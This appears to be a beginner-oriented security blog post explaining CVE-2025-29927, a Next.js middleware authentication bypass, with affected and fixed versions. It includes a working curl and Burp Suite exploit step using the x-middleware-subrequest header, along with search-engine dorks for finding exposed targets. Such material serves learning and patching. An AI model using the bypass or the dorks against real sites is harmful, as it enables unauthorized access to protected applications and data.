Skip to main content

๐Ÿ”’ CVE-2025-29927 – Middleware Bypass in Next.js Explained Simply

 ๐Ÿ“Œ Introduction

CVE-2025-29927 is a critical vulnerability in Next.js, a popular open-source React framework by Vercel. This flaw allows attackers to bypass middleware-based authentication and authorization, gaining access to protected endpoints without permission. In this post, I’ll break it down simply for beginners and fellow developers.

 

๐Ÿ’ก What is Next.js?

Next.js is a React-based framework that helps developers build fast, scalable web apps. It offers:

  • Automatic Code Splitting – Sends only necessary code to the browser.

  • ๐ŸŒ SSR & SSG – Server-side rendering and static site generation for performance and SEO.

  • ๐Ÿ”— API Routes – Handle backend logic within the same app.

  • ๐Ÿ›ก️ Middleware – Add custom logic (auth, logging, redirects) before reaching routes.

 

๐Ÿ” Understanding Middleware in Next.js

Middleware runs before the request reaches a page or API route. Common uses:

  • ✅ Authentication & Authorization

  • ๐Ÿ“Š Request Logging

  • ๐Ÿ”€ Header or URL Modifications

     

    ⚠️ What is CVE-2025-29927?

    This CVE allows attackers to bypass middleware authentication due to improper validation. An attacker can manipulate cookies or headers to skip login checks and access protected areas.

    ๐Ÿงช How to Identify & Exploit It

    ✅ Step 1: Check if a site uses Next.js

    Use tools like:

  • Wappalyzer extension

  • Look for:

    • /_next/static/chunks/

    • Response header: X-Powered-By: Next.js

๐Ÿšจ Step 3: Bypass Auth (Exploit)

Use curl: 

curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboard

 

Using Burp Suite:

  • Send request to Repeater.

  • Add the header:

    x-middleware-subrequest: middleware:middleware:middleware:middleware



    ๐Ÿ•ต️ Dorks for Target Discovery
    

    • 

      Shodan: x-middleware-rewrite, http.html:"/_next/static"
      

    • 

      FOFA: body="/_next/static"
      

    • 

      Google: inurl:"/_next" AND intext:"next.config.js"

๐Ÿ”ฅ Impact of CVE-2025-29927

  • ๐Ÿšซ Unauthorized access to sensitive data

  • ๐Ÿš€ Privilege escalation (admin access)

  • ๐Ÿ’ฃ Full application compromise

๐Ÿ“Œ Affected Versions

VersionFixed In
Next.js 15.x15.2.3 or later
Next.js 14.x14.2.25 or later
Next.js 13.x13.5.9 or later
Next.js 12.x12.3.5 or later



Comments

Post a Comment

Popular posts from this blog

TryHackMe | Advent of Cyber 2024 | Day 1 | by INDCRYPT

  Dive into the wonderful world of cyber security by engaging in festive beginner-friendly exercises every day in the lead-up to Christmas! Day 1: Maybe SOC-mas music, he thought, doesn't come from a store? Answer the questions below 1. Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author? 
Post a Comment
Read more

Weak Registration Mechanism Vulnerability (P4)

The user registration and account verification process in the application is vulnerable due to a weak implementation of the verification link. Specifically, the verification link is sent via HTTP rather than the more secure HTTPS . This exposes the system to potential man-in-the-middle (MITM) attacks and account takeover risks . While this issue does not necessarily lead to immediate access to user accounts, attackers could intercept and manipulate the verification link, potentially gaining unauthorized access to accounts or causing data leakage .       Steps to Reproduce: Open the URL: example.com/signup . Complete the registration process to trigger the verification email. Open your inbox and locate the verification email. Right-click on the verification link and select "Copy link address." Paste the link into a text editor or directly into your browser's address bar. Check if the URL uses HTTP instead of HTTPS . Press Enter to open the link and observe the behavio...
Post a Comment
Read more

How to Resolve VirtualBox Clipboard and File Sharing Issues

Overview If you’re encountering the following issues while using VirtualBox: Clipboard not functioning Copy-paste failing between host and guest File sharing difficulties between host and guest VirtualBox Guest Additions services crashing or not running This guide provides a step-by-step solution to resolve these problems. Step 1: Verify VirtualBox Advanced Settings Open VirtualBox and select the virtual machine (VM) experiencing issues. Click Settings and navigate to the General > Advanced tab. Set Shared Clipboard to Bidirectional . Set Drag and Drop to Bidirectional . Click OK to save your changes and start the VM to test if the issue is resolved. Step 2: Use the Devices Menu While the VM is running, go to the top menu and click on Devices . Select Insert Guest Additions CD Image . If prompted, follow the on-screen instructions to install or update the Guest Additions. Restart the VM after installation. If this step does not resolve the issue, proceed to the next solution. ...
Post a Comment
Read more